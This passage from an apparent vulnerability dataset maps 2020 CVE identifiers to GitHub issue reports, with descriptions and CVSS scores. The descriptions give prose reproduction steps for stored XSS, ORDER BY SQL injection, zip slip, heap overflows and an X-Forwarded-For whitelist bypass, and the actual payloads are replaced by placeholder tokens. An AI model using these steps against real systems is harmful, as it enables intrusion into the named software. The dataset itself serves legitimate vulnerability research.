  46826. "exploitabilityScore": 2.8
  46827. },
  46828. {
  46829. "CVE_ID": "CVE-2020-11709",
  46830. "Issue_Url_old": "https://github.com/yhirose/cpp-httplib/issues/425",
  46831. "Issue_Url_new": "https://github.com/yhirose/cpp-httplib/issues/425",
  46832. "Repo_new": "yhirose/cpp-httplib",
  46833. "Issue_Created_At": "2020-04-11T03:38:58Z",
  46834. "description": "set_redirect & set_header are susceptible to http response splitting attack. ref: URLTAG Analysis CODETAG APITAG CODETAG Lastly, this library is gorgeous. Thank you!!",
  46835. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  46836. "severity": "HIGH",
  46837. "baseScore": 7.5,
  46838. "impactScore": 3.6,
  46839. "exploitabilityScore": 3.9
  46840. },
  46841. {
  46842. "CVE_ID": "CVE-2020-11721",
  46843. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/134",
  46844. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/134",
  46845. "Repo_new": "saitoha/libsixel",
  46846. "Issue_Created_At": "2020-04-11T06:09:36Z",
  46847. "description": "Invalid free wild pointer lead to DOS in load_png in loader.c. APITAG has a pointer rows , which should be set to NULL, otherwise cleanup code would use(calling free ) it. binary: img2sixel file: loader.c function: load_png poc: FILETAG result: CODETAG",
  46848. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  46849. "severity": "MEDIUM",
  46850. "baseScore": 6.5,
  46851. "impactScore": 3.6,
  46852. "exploitabilityScore": 2.8
  46853. },
  46854. {
  46855. "CVE_ID": "CVE-2020-11767",
  46856. "Issue_Url_old": "https://github.com/istio/istio/issues/9429",
  46857. "Issue_Url_new": "https://github.com/istio/istio/issues/9429",
  46858. "Repo_new": "istio/istio",
  46859. "Issue_Created_At": "2018-10-19T15:08:30Z",
  46860. "description": "ERRORTAG NR when using browser on multiple ingress gateways. Describe the bug When using browsers (tested on multiple browsers, multiple OS, multiple devices and multiple connections), we are having many ERRORTAG NR responses when contacting our services on an additional ingress gateway. The service is loading well every time I'm cleaning the browsers cache and when using command line clients. Routing is done with hostname in separate gateway and virtual services configurations. All services are exposed on port NUMBERTAG using different port names but the same TLS certificate. Ingress log is printing the good hostname but envoy is not finding any routes. Expected behavior We expect to have the requests routed to the service or a way to find if there is something missing in the configuration. Steps to reproduce the bug Install another ingress gateway using helm Deploy NUMBERTAG services and expose it using a gateway with TLS on port NUMBERTAG Use a browser to access the services Version Kubernetes NUMBERTAG on AWS Istio NUMBERTAG Installation Istio installed using helm chart with a first ingress gateway. Second gateway installed using helm in a namespace. Services installed using helm charts. Environment Kubernetes deployed on AWS using Kops with coreos images. Cluster state FILETAG I could not dump pods and deployments due to private information in environment variables",
  46861. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
  46862. "severity": "LOW",
  46863. "baseScore": 3.1,
  46864. "impactScore": 1.4,
  46865. "exploitabilityScore": 1.6
  46866. },
  46867. {
  46868. "CVE_ID": "CVE-2020-11767",
  46869. "Issue_Url_old": "https://github.com/istio/istio/issues/13589",
  46870. "Issue_Url_new": "https://github.com/istio/istio/issues/13589",
  46871. "Repo_new": "istio/istio",
  46872. "Issue_Created_At": "2019-04-24T17:12:32Z",
  46873. "description": "Istio does not adhere to HTTP NUMBERTAG RFC NUMBERTAG Bug description Istio does not properly send a NUMBERTAG response when a connection is reused and accident sent to a server that is not the correct origin. This can occur when there are two gateways, one with a wildcard certificate ( . APITAG and one with a different non wildcard certificate (b. APITAG routing to two different apps (a.example.com and b. APITAG where a http NUMBERTAG connection is first established to the wildcard gateway (on host a.example.com with . APITAG then a resource is requested from an application on the non wildcard gateway (b.example.com with certificate b. APITAG Because of http NUMBERTAG connection reuse it's possible for traffic destined for the second app (b. APITAG to end up being routed on the existing connection for (a. APITAG due to the RFC definition of connection re use in section NUMBERTAG FILETAG e.g., because the certificate can authoritatively handle the request, and the IP address is the same as they are on the same ingressgateway). When that happens, according to section NUMBERTAG istio should respond with a NUMBERTAG indicating that the wrong connection was used and the origin was not found. This would instruct the browser to retry on a new connection, thus renegotiating TLS and presenting SNI and thus going down the non wildcard certificate route and to a different gateway/virtual service and the correct service. Expected behavior Instead of returning a NUMBERTAG as section NUMBERTAG indicates in RFC NUMBERTAG istio returns a ERRORTAG . Steps to reproduce the bug NUMBERTAG Create istio NUMBERTAG instance with one ingress gateway NUMBERTAG Create a DNS record a. APITAG and b.example.com both point to the ingress gateway NUMBERTAG Create a gateway named \"a\" for a.example.com that uses .example.com server host, and has a wildcard certificate for . 
APITAG NUMBERTAG Create a gateway named \"b\" for b.example.com that uses b.example.com server host and has a specific certificate b. APITAG NUMBERTAG Create an app that hosts a static website with two files FILETAG and FILETAG . The FILETAG file should have an image tag that refers to an image FILETAG (e.g., APITAG NUMBERTAG Deploy the app twice to Kubernetes and attach virtual services for a.example.com to go to the app and b.example.com to go to the app (effectively a.example.com and b.example.com are both hosting the app with different certificates on the same IP address, where a is on a wildcard cert and b is not NUMBERTAG isit URLTAG notice that you receive a ERRORTAG in Chrome and Firefox but not safari or opera. Version (include the output of APITAG and kubectl version ) CODETAG How was Istio installed? Helm Environment where bug was observed (cloud vendor, OS, etc) AWS, with istio installed and running with an NLB ingress or as a nodeport terminating the TLS.",
  46874. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
  46875. "severity": "LOW",
  46876. "baseScore": 3.1,
  46877. "impactScore": 1.4,
  46878. "exploitabilityScore": 1.6
  46879. },
  46880. {
  46881. "CVE_ID": "CVE-2020-11767",
  46882. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/6767",
  46883. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/6767",
  46884. "Repo_new": "envoyproxy/envoy",
  46885. "Issue_Created_At": "2019-05-01T14:21:34Z",
  46886. "description": "Envoy does not adhere to HTTP NUMBERTAG RFC NUMBERTAG Title : Envoy does not adhere to HTTP NUMBERTAG RFC NUMBERTAG Description : >RFC NUMBERTAG Section NUMBERTAG and NUMBERTAG specifies when a request coming in through a re used HTTP NUMBERTAG connection is accidentally sent to a non origin but authoritative server that a NUMBERTAG response should be returned. This can happen if two servers one with a wildcard certificate (e.g., a. APITAG and another server (b. APITAG with a non wildcard on the same IP address using SNI responds to requests those meant for server b.example.com will accidentally be forwarded down the re used HTTP NUMBERTAG connection for a. APITAG In this situation a.example.com should send back a NUMBERTAG to indicate the request was destined for b. APITAG This forces browsers to re establish a new connection, re negotiate the SNI, and thus the backing server and subsequently route to the correct origin. [optional Relevant Links :] FILETAG section describing connection re use FILETAG section describing misdirected response CVETAG The bug was originally filed against Chromium however they indicated Istio was the issue. URLTAG The bug was then filed against istio who indicated envoy was the issue.",
  46887. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
  46888. "severity": "LOW",
  46889. "baseScore": 3.1,
  46890. "impactScore": 1.4,
  46891. "exploitabilityScore": 1.6
  46892. },
  46893. {
  46894. "CVE_ID": "CVE-2020-11872",
  46895. "Issue_Url_old": "https://github.com/opentrace-community/opentrace-cloud-functions/issues/7",
  46896. "Issue_Url_new": "https://github.com/opentrace-community/opentrace-cloud-functions/issues/7",
  46897. "Repo_new": "opentrace-community/opentrace-cloud-functions",
  46898. "Issue_Created_At": "2020-04-13T09:37:43Z",
  46899. "description": "Incorrect IV Initialisation for AES NUMBERTAG GCM and Constraints on the Number of Invocations. The current implementation does not follow NIST Special Publication NUMBERTAG D, in particular Section NUMBERTAG IV Constructions and NUMBERTAG Constraints on the Number of Invocations regarding the secret key. To mitigate NUMBERTAG IVs can be converted to deterministic construction per NUMBERTAG To mitigate NUMBERTAG Temporary IDs should use an ephemeral key derived from the secret key and uid values, so that the same key is not used for more than NUMBERTAG operations. The current implementation may permit an adversary to fabricate IDs or Upload Tokens, if they collect duplicated IVs or more than NUMBERTAG encryption operations are performed against the same key.",
  46900. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  46901. "severity": "HIGH",
  46902. "baseScore": 7.5,
  46903. "impactScore": 3.6,
  46904. "exploitabilityScore": 3.9
  46905. },
  46906. {
  46907. "CVE_ID": "CVE-2020-11887",
  46908. "Issue_Url_old": "https://github.com/domenic/svg2png/issues/117",
  46909. "Issue_Url_new": "https://github.com/domenic/svg2png/issues/117",
  46910. "Repo_new": "domenic/svg2png",
  46911. "Issue_Created_At": "2020-04-17T02:35:29Z",
  46912. "description": "SSRF and Server Side XSS. this package uses phantomjs to render a xml snippet to image\uff0cthus the xml can be any html ,script. As the render process runs at backend,so there aressrf and server side xss risks.",
  46913. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46914. "severity": "MEDIUM",
  46915. "baseScore": 6.1,
  46916. "impactScore": 2.7,
  46917. "exploitabilityScore": 2.8
  46918. },
  46919. {
  46920. "CVE_ID": "CVE-2020-11888",
  46921. "Issue_Url_old": "https://github.com/trentm/python-markdown2/issues/348",
  46922. "Issue_Url_new": "https://github.com/trentm/python-markdown2/issues/348",
  46923. "Repo_new": "trentm/python-markdown2",
  46924. "Issue_Created_At": "2020-04-13T00:38:25Z",
  46925. "description": "Another Filter bypass leading to XSS. On the latest release NUMBERTAG a payload like this one can lead to xss and bypass safe_mode when set to true. APITAG The Problem: I think its due to just bad regex's not detecting non alphanumeric tags. FILETAG",
  46926. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46927. "severity": "MEDIUM",
  46928. "baseScore": 6.1,
  46929. "impactScore": 2.7,
  46930. "exploitabilityScore": 2.8
  46931. },
  46932. {
  46933. "CVE_ID": "CVE-2020-11894",
  46934. "Issue_Url_old": "https://github.com/libming/libming/issues/196",
  46935. "Issue_Url_new": "https://github.com/libming/libming/issues/196",
  46936. "Repo_new": "libming/libming",
  46937. "Issue_Created_At": "2020-04-17T02:47:07Z",
  46938. "description": "heap overflow in APITAG APITAG ./swftocxx $poc FILETAG ERRORTAG",
  46939. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  46940. "severity": "CRITICAL",
  46941. "baseScore": 9.1,
  46942. "impactScore": 5.2,
  46943. "exploitabilityScore": 3.9
  46944. },
  46945. {
  46946. "CVE_ID": "CVE-2020-11895",
  46947. "Issue_Url_old": "https://github.com/libming/libming/issues/197",
  46948. "Issue_Url_new": "https://github.com/libming/libming/issues/197",
  46949. "Repo_new": "libming/libming",
  46950. "Issue_Created_At": "2020-04-17T02:50:13Z",
  46951. "description": "heap overflow in APITAG APITAG ./swftocxx $poc FILETAG ERRORTAG",
  46952. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  46953. "severity": "CRITICAL",
  46954. "baseScore": 9.1,
  46955. "impactScore": 5.2,
  46956. "exploitabilityScore": 3.9
  46957. },
  46958. {
  46959. "CVE_ID": "CVE-2020-11944",
  46960. "Issue_Url_old": "https://github.com/bitcoin-abe/bitcoin-abe/issues/292",
  46961. "Issue_Url_new": "https://github.com/bitcoin-abe/bitcoin-abe/issues/292",
  46962. "Repo_new": "bitcoin-abe/bitcoin-abe",
  46963. "Issue_Created_At": "2020-04-20T21:24:43Z",
  46964. "description": "Page Not Found Handler Cross site Scripting CVETAG . A lack of filtering around line NUMBERTAG of abe.py ERRORTAG allows attackers to abuse the Page Not Found error handler and pass rogue APITAG to unsuspecting users using a specially crafted URL: ERRORTAG MITRE has assigned CVETAG URLTAG to this flaw. Thank you.",
  46965. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46966. "severity": "MEDIUM",
  46967. "baseScore": 6.1,
  46968. "impactScore": 2.7,
  46969. "exploitabilityScore": 2.8
  46970. },
  46971. {
  46972. "CVE_ID": "CVE-2020-12071",
  46973. "Issue_Url_old": "https://github.com/anchorcms/anchor-cms/issues/1333",
  46974. "Issue_Url_new": "https://github.com/anchorcms/anchor-cms/issues/1333",
  46975. "Repo_new": "anchorcms/anchor-cms",
  46976. "Issue_Created_At": "2020-04-22T19:08:17Z",
  46977. "description": "Stored Cross Site Scripting Exists in post content.. Summary A user is able to inject APITAG into a post via the post creation feature. Expected Behaviour The CMS should HTML encode any inputted data so it is reflected back safely to the user. Actual Behaviour The CMS reflects back the post content without HTML encoding, meaning the client browser renders it as valid HTML / JS on the main page, and on that posts page. This can lead to malicious javascript being executed on anyone who visits the site's browser. Context details (if applicable) Anchor version NUMBERTAG Server setup: Ubuntu running apache2 and PHP NUMBERTAG Reproduction NUMBERTAG Login to admin panel NUMBERTAG Create a blog post where the post title can be anything, and post content is an XSS payload, in my case, I used APITAG NUMBERTAG Go to the main page to trigger the payload, alternatively, go to the blog post created in the previous step, this too shall trigger the payload. FILETAG As we can see in the blog post source, the title and category are both HTML encoded before being reflected back to the user, although, the post content is not, and our browser renders our JS as valid code. FILETAG",
  46978. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  46979. "severity": "MEDIUM",
  46980. "baseScore": 4.8,
  46981. "impactScore": 2.7,
  46982. "exploitabilityScore": 1.7
  46983. },
  46984. {
  46985. "CVE_ID": "CVE-2020-12079",
  46986. "Issue_Url_old": "https://github.com/beakerbrowser/beaker/issues/1519",
  46987. "Issue_Url_new": "https://github.com/beakerbrowser/beaker/issues/1519",
  46988. "Repo_new": "beakerbrowser/beaker",
  46989. "Issue_Created_At": "2020-03-10T08:47:37Z",
  46990. "description": "Security issue report. hello, I've find a critical vulnerability inside beaker browser, and have sent you details of this vulnerability by sending email to MENTIONTAG . Please check it and feel free to contact me.",
  46991. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  46992. "severity": "CRITICAL",
  46993. "baseScore": 10.0,
  46994. "impactScore": 6.0,
  46995. "exploitabilityScore": 3.9
  46996. },
  46997. {
  46998. "CVE_ID": "CVE-2020-12102",
  46999. "Issue_Url_old": "https://github.com/prasathmani/tinyfilemanager/issues/357",
  47000. "Issue_Url_new": "https://github.com/prasathmani/tinyfilemanager/issues/357",
  47001. "Repo_new": "prasathmani/tinyfilemanager",
  47002. "Issue_Created_At": "2020-05-11T04:33:34Z",
  47003. "description": "security breaches in tiny file manager. hi, are you aware of this? URLTAG see also other mentions: URLTAG",
  47004. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
  47005. "severity": "HIGH",
  47006. "baseScore": 7.7,
  47007. "impactScore": 4.0,
  47008. "exploitabilityScore": 3.1
  47009. },
  47010. {
  47011. "CVE_ID": "CVE-2020-12265",
  47012. "Issue_Url_old": "https://github.com/kevva/decompress/issues/71",
  47013. "Issue_Url_new": "https://github.com/kevva/decompress/issues/71",
  47014. "Repo_new": "kevva/decompress",
  47015. "Issue_Created_At": "2019-10-04T07:09:44Z",
  47016. "description": "Vulnerable to zip slip. It appears as decompress is vulnerable to archives containing files that hold path traversal names such as APITAG . As a APITAG I have attached a .tar archive that will, when extracted, create a file in APITAG . Use the example code to extract: APITAG Note that this will not work out of the box with .zip archives since yauzl will throw an exception if the entry's filename contains \" APITAG \".",
  47017. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47018. "severity": "CRITICAL",
  47019. "baseScore": 9.8,
  47020. "impactScore": 5.9,
  47021. "exploitabilityScore": 3.9
  47022. },
  47023. {
  47024. "CVE_ID": "CVE-2020-12286",
  47025. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6333",
  47026. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6333",
  47027. "Repo_new": "octopusdeploy/issues",
  47028. "Issue_Created_At": "2020-04-28T03:53:17Z",
  47029. "description": "APITAG permission is not scoped to any dimensions e.g. Projects, environments and tenants. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) The bug APITAG permission is not scoped to any dimension. e.g. Scoped users scoped to Tenant A are able to view server tasks scoped to Tenant B. Description APITAG Affected versions APITAG Octopus Server: Affects at least NUMBERTAG APITAG Fixed in APITAG APITAG and master Mitigation APITAG NA Workarounds APITAG NA Relevant Pull Request(s) URLTAG Relevant Private Isssue(s) URLTAG",
  47030. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  47031. "severity": "MEDIUM",
  47032. "baseScore": 4.3,
  47033. "impactScore": 1.4,
  47034. "exploitabilityScore": 2.8
  47035. },
  47036. {
  47037. "CVE_ID": "CVE-2020-12286",
  47038. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6331",
  47039. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6331",
  47040. "Repo_new": "octopusdeploy/issues",
  47041. "Issue_Created_At": "2020-04-28T03:36:15Z",
  47042. "description": "APITAG permission is not scoped to any dimensions e.g. Projects, environments and tenants. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) The bug APITAG permission is not scoped to any dimension. e.g. Scoped users scoped to Tenant A are able to view server tasks scoped to Tenant B. Description APITAG Affected versions APITAG Octopus Server: Affects at least NUMBERTAG APITAG Fixed in APITAG APITAG and master Mitigation APITAG NA Workarounds APITAG NA",
  47043. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  47044. "severity": "MEDIUM",
  47045. "baseScore": 4.3,
  47046. "impactScore": 1.4,
  47047. "exploitabilityScore": 2.8
  47048. },
  47049. {
  47050. "CVE_ID": "CVE-2020-12286",
  47051. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6332",
  47052. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6332",
  47053. "Repo_new": "octopusdeploy/issues",
  47054. "Issue_Created_At": "2020-04-28T03:44:10Z",
  47055. "description": "APITAG permission is not scoped to any dimensions e.g. Projects, environments and tenants. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) The bug APITAG permission is not scoped to any dimension. e.g. Scoped users scoped to Tenant A are able to view server tasks scoped to Tenant B. Description APITAG Affected versions APITAG Octopus Server: Affects at least NUMBERTAG APITAG Fixed in APITAG APITAG and master Mitigation APITAG NA Workarounds APITAG NA Relevant Pull Request(s) URLTAG Relevant Private Isssue(s) URLTAG",
  47056. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  47057. "severity": "MEDIUM",
  47058. "baseScore": 4.3,
  47059. "impactScore": 1.4,
  47060. "exploitabilityScore": 2.8
  47061. },
  47062. {
  47063. "CVE_ID": "CVE-2020-12438",
  47064. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2307",
  47065. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2307",
  47066. "Repo_new": "php-fusion/PHP-Fusion",
  47067. "Issue_Created_At": "2020-04-27T14:46:08Z",
  47068. "description": "Cross Site Scripting Vulnerability on \"banner\" feature in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a stored XSS vulnerability in the \"banner\" feature. This was previously patched to remove any \" APITAG \" tags in the banner, although this can be bypassed by using HTML event handlers, such as \"onerror\". To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click edit on banner one, or add a new banner NUMBERTAG Insert payload \" APITAG APITAG NUMBERTAG iew the page to trigger XSS. Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Screenshots FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version of Browser NUMBERTAG",
  47069. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47070. "severity": "MEDIUM",
  47071. "baseScore": 5.4,
  47072. "impactScore": 2.7,
  47073. "exploitabilityScore": 2.3
  47074. },
  47075. {
  47076. "CVE_ID": "CVE-2020-12439",
  47077. "Issue_Url_old": "https://github.com/mimblewimble/grin/issues/3235",
  47078. "Issue_Url_new": "https://github.com/mimblewimble/grin/issues/3235",
  47079. "Repo_new": "mimblewimble/grin",
  47080. "Issue_Created_At": "2020-02-20T15:50:04Z",
  47081. "description": "Rework output_pos index (better txhashset transactional support). Recent exploration into the implementation of an index of \"recently seen\" kernels led us down the path of maintaining an \"undo\" list per block. This way we can robustly handle duplicate kernels, maintaining the pos of the most recent instance of the kernel in the index, while being able to handle rewind scenarios involving previous instances of the kernel. Related URLTAG We do something similar to this for the APITAG index currently where we track a bitmap of spent output pos per block. And during rewind we use this per block bitmap to ensure the UTXO set is consistent with rewound chain state. Note that this allows the utxo set to be rewound reliably but leaves \"false positives\" in the APITAG index as we do not rewind the index itself. So we have always used the APITAG index as non authoritative. During rewind we can (and will expect to) encounter \"false positive\" results from the index. We may find an entry in the index for a given output, but we do not yet know for sure if this index entry is accurate. So we go to the PMMR itself for authoritative view of chain state. The process is roughly look in output_pos for possible result if nothing in index then output is spent if we find a result in the index, look in the output PMMR compare output commitment between index and PMMR if match then output is unspent otherwise output is spent It became apparent during the kernel index exploration that there is a better way to do this that can also be applied to the APITAG index. Rather than storing a bitmap of spent output positions which is by definition unsorted, we can store a vec of output positions where the sort order is consistent with the inputs to the block. This provides the ability to map positions to input commitments themselves. Rewind can now take advantage of this to ensure the output_pos index remains consistent with the rewound chain state. 
The APITAG index can be maintained transactionally alongside block processing, in both regular (apply new block) and rewound directions. This eliminates the possibility for \"false positives\" in the index lookup. If we find an entry in the index then we know the output is unspent. If we do not find an entry, the output is spent, or never existed. This involves a change to what we store in the db. We need to store a vec of output_pos (and associated block heights) rather than the existing serialized bitmap per block. This also involves changes to both APITAG and the APITAG impls to update the APITAG as necessary, within the txhashset extension (and therefore transactionally). Reworking the APITAG index to handle transactional rewind in this way gives us a clear path forward to use the same approach for the APITAG index. Rather than \"spending\" outputs we replace kernels with more recent instances (in the \"recently seen\" index). We have this working on a branch. PR coming shortly for these changes. Ideally we can get this into APITAG and allow it to be sufficiently tested and released as part of APITAG . Tracking this here so we can tag it as scheduled for inclusion in APITAG .",
  47082. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  47083. "severity": "MEDIUM",
  47084. "baseScore": 5.3,
  47085. "impactScore": 1.4,
  47086. "exploitabilityScore": 3.9
  47087. },
  47088. {
  47089. "CVE_ID": "CVE-2020-12458",
  47090. "Issue_Url_old": "https://github.com/grafana/grafana/issues/8283",
  47091. "Issue_Url_new": "https://github.com/grafana/grafana/issues/8283",
  47092. "Repo_new": "grafana/grafana",
  47093. "Issue_Created_At": "2017-05-03T16:54:15Z",
  47094. "description": "APITAG Wrong permissions in grafana package for grafana.db. It looks like in URLTAG there were plans to lock down the sqlite DB to NUMBERTAG While grafana.ini did get locked down, the DB did not. Unless this is no longer believed to be necessary I could try to send a PR. What Grafana version are you using NUMBERTAG What datasource are you using? APITAG What OS are you running grafana on? APITAG NUMBERTAG What did you do? Logged into grafana.db as a regular user What was the expected result? Permission denied What happened instead? Logged in without issue, able to query salt and password for users CODETAG",
  47095. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  47096. "severity": "MEDIUM",
  47097. "baseScore": 5.5,
  47098. "impactScore": 3.6,
  47099. "exploitabilityScore": 1.8
  47100. },
  47101. {
  47102. "CVE_ID": "CVE-2020-12460",
  47103. "Issue_Url_old": "https://github.com/trusteddomainproject/OpenDMARC/issues/64",
  47104. "Issue_Url_new": "https://github.com/trusteddomainproject/opendmarc/issues/64",
  47105. "Repo_new": "trusteddomainproject/opendmarc",
  47106. "Issue_Created_At": "2020-07-25T10:48:50Z",
  47107. "description": "Memory corruption in APITAG There is a memory corruption vulnerability in APITAG of libopendmarc during parsing of DMARC aggregate reports. The root cause is improper null termination. The function APITAG does not explicitly add a null terminator NUMBERTAG to the buffer holding the XML data after reading the contents from a report file. This can cause an off by one error in APITAG in certain cases depending on the report file, resulting in a one byte heap overflow. A null byte write occurs during the parsing at APITAG APITAG . Eventually, during parsing of a specially crafted report, this null byte will overflow to the next chunk on the heap, overwriting the heap metadata, as indicated by the following valgrind output. CODETAG The size field and the least significant bits used as flags are overwritten in the metadata. The relevant flag for this vulnerability is the bit indicating 'previous chunk in use', known as PREV_INUSE which will be set to zero and determines if the previous chunk (storing bufp) is free. When the buffer is later free'd at APITAG APITAG a crash occurs as bufp is listed as not used. ERRORTAG A remote attacker could provide a specially crafted report that is parsed by this library, causing a denial of service. It could possibly lead to code execution depending on how libopendmarc is used and integrated into the application and in particular if the opendmarc_xml function is used explicitly without calling opendmarc_xml_parse and with input that is not null terminated. A DMARC aggregate report that triggers this vulnerability can be generated using the following commands: APITAG",
  47108. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47109. "severity": "CRITICAL",
  47110. "baseScore": 9.8,
  47111. "impactScore": 5.9,
  47112. "exploitabilityScore": 3.9
  47113. },
  47114. {
  47115. "CVE_ID": "CVE-2020-12461",
  47116. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2308",
  47117. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2308",
  47118. "Repo_new": "php-fusion/PHP-Fusion",
  47119. "Issue_Created_At": "2020-04-28T18:43:09Z",
  47120. "description": "Authenticated SQL Injection Exists in any page that allows control over the sort order.. Describe the bug A SQLi exists in any page that allows control over the order of the response from the SQL query ran on the database, as far as I can tell. I have verified the existence of the SQLi by monitoring the APITAG logs, and noticing I have control over anything after the \"ORDERY BY\" parameter. Although people thing this clause is not exploitable, it actually is, fairly simply, as I demonstrated here: URLTAG I am happy to send an example payload that allows for data exfiltration in private, although I think until this is patched, a working payload should not be made public. To Reproduce Steps to reproduce the behavior NUMBERTAG Login on the app NUMBERTAG Go to the \"search for members\" feature NUMBERTAG Change the order by parameter and click search NUMBERTAG Notice the URL now contains additional GET parameters, one of which is \"sort_order NUMBERTAG Strip target URL of unnecessary parts, leaving something like: APITAG NUMBERTAG Insert ORDER BY SQLi payload into sort_order parameter NUMBERTAG Depending on database output, and order, you can judge what the output of the binary query was, and exfiltrate data. Expected behavior Only allow the selection of \"ASC\" or \"DESC\" (non case sensitive), this is all you need for the desired functionality. __WARNING, DO NOT JUST BLOCK WHITESPACES, EXPLICITLY MATCH ASC OR DESC__. Screenshots FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG Additional context This was tested on the latest version, more information available upon request. For clarity, if the query failed, the APITAG Logs would not have my modification in it. This can be modified to a variety of things, as long as it is valid SQL syntax.",
  47121. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  47122. "severity": "HIGH",
  47123. "baseScore": 8.8,
  47124. "impactScore": 5.9,
  47125. "exploitabilityScore": 2.8
  47126. },
  47127. {
  47128. "CVE_ID": "CVE-2020-12477",
  47129. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2761",
  47130. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2761",
  47131. "Repo_new": "nilsteampassnet/teampass",
  47132. "Issue_Created_At": "2020-04-02T16:10:04Z",
  47133. "description": "IP whitelist bypass. Teampass includes a feature to restrict the source IP address users can use to interact with Teampass. The value of the source IP address is defined from the first value in the X Forwarded For header in the client request. Due to the fact that the client controls the X Forwarded For header and can set it to any value of their choosing, this header can be set to a whitelisted value which allows any client that can guess a whitelisted IP address to interact with Teampass from wherever they like. Steps to reproduce NUMBERTAG Add NUMBERTAG to the list of API IP Addresses allowed NUMBERTAG Make an API call with an appropriate X Forwarded For header and notice that the call is valid APITAG Steps to fix No data in headers provided by the client can be trusted, including X Forwarded For. The only reliable data about a client IP address is in the Source Address field in a TCP packet ( FILETAG . Server configuration Teampass version NUMBERTAG",
  47134. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47135. "severity": "HIGH",
  47136. "baseScore": 7.5,
  47137. "impactScore": 3.6,
  47138. "exploitabilityScore": 3.9
  47139. },
  47140. {
  47141. "CVE_ID": "CVE-2020-12478",
  47142. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2764",
  47143. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2764",
  47144. "Repo_new": "nilsteampassnet/teampass",
  47145. "Issue_Created_At": "2020-04-02T16:18:48Z",
